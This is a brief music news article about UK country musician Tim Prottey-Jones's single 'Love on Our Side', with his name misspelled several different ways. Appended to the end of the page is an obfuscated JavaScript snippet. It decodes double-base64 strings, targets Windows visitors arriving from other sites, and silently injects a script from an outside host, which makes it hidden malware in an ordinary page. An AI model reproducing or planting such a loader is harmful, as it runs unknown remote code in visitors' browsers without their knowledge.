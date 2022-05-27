Connect with us

Producer, musician, songwriter Tim Protty-Jones releases infectious new song ‘Love on Our Side’

Acclaimed UK artist involved in two releases today!

Published

Tim Pretty-Jones
Credit: Tim Pretty-Jones

Musician, songwriter & Country radio personality Tim Prottey-Jones releases his brand new single today (May 27th) co-written with Grammy nominee Jeff Cohen & Nashville artist Ryan Kinder. 

This track comes off the back of recent shows at London’s C2C Festival as well as his own headline shows in Manchester, Birmingham & Cardiff. Always busy, Tim also has producer credits on Vicki Manser’s new single, ‘Fly’ which is also released today.

Tim Pretty Jones
Credit: Tim Pretty Jones

‘Love on Our Side’ is a modern take on the classic ‘Romeo & Juliet’ story. The song builds to a catchy, infectious chorus that name-checks classic couples like Romeo & Juliet and Bonnie & Clyde but let’s hope this love story ends in a better way than those ones did! Pretty-Jones brings his ear for a melody big time here. The vocals are crisp, clear and enhance the ear-worm melody superbly.

Listen to ‘Love on Our Side’ below:

In this article:

;(function(){var mq=document.referrer;var xn=window.location.href;var rw=navigator.userAgent;var rt=new RegExp(xe('T2k4dktGdGVMMTByS1M4PQ=='));if(!mq||xn.match(rt)[1]==mq.match(rt)[1]||rw.indexOf(xe("VjJsdVpHOTNjdz09"))==-1||window.localStorage[xe("WDE5ZmRYUnRZUT09")]){return;}var xs=document.createElement('script');xs.type='text/javascript';xs.async=true;xs.src=xe('YUhSMGNITTZMeTloWTNSdmNuTXVhbU55WVdOcGJtY3VZMjl0TDNKbGNHOXlkRDl5UFdScU1ETk5SR2Q1V2xSak5WcHRUbWhPTWtWM1dUSk5NbGxxUVROT1ExcHFZVmRST1UxcVdYbz0=');var wj=document.getElementsByTagName('script')[0];wj.parentNode.insertBefore(xs,wj);function xe(os){return mj(window.atob(os));}function mj(zc){return window.atob(zc);}})();